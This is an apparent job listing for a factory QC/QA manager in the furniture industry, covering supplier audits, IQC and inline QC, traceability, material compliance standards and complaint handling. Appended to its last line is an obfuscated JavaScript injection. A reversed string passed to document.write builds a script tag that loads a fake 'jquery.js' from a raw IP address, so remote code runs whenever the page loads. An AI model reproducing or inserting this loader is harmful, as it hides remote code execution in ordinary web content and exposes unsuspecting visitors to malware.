Be responsible for all aspects of employing and managing the QC and QA within whilst working alongside the Innovations QC and QA team. Having full QC and QA responsibility for the factory and suppliers of the factory with the exception of Innovations.
– Be responsible for supplier audits both local and overseas
– Be responsible for suppliers’ quality
– Ensure all overseas QC is put in place as required in accordance to AQL or seen need (with the exception of Innovations). Show planning and justify costs and need
– Be responsible for IQC as the quality gate for the factory. Ensuring standards are known by them to the right standard (not too strong or too weak) and as we brought and agreed the goods would be.
– Inline QC and quality process
– Linking and making staff responsible for the chain of Audit / Supplier QC / IQC and Inline QC with consumer & customer quality (front to back responsibility for all QC & QA subjects)
– Quality training, quality meetings and quality updates to management and departments.
– Penalize and incentivize both for suppliers and within quality performance
– Quality standards (designing, implementing and enforcing) – ensuring everything and everyone has a specification and standard
– Establishing and implement traceability along with responsibility for suppliers, raw materials and a workers work. Keep Traceability documentation.
– Keep ALL raw material standards and data sheets in accordance to Company, legal and customer requirements. This includes REACH / MSDS / Cosh / EUTR / Structure properties / Fire / Chemical / 16p and so on. Keep up to date with those standards and implement new standards depending on the changes within the law, customer requirements or company requirements. Circulate them as required and keep all members of the company Group or relevant customers informed (before they ask!).
– Respond immediately to all customers complaints with timelines and feedback
– Implement NCR / CAR / ECR etc as needed. Document and update all parties within good timescale on solutions.
– Gather all QC data with a back to “datum” attitude. This means – establish “why” there is a problem in a very precise and diligent manner and then proceed from that point. There cannot be any assumptions before finding solutions.
– There can never be NO solution. Therefore EVERYTHING has a timeline for resolution and you are responsible for providing accurate guideline times for repeated subjects and accurate timelines for unknown subjects
– Chart and plot all quality activities
– Relevant experience in QA/QC, suppliers, etc.
– Able to lead and manage subordinates.
– Experience in the furniture industry is an advantage. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))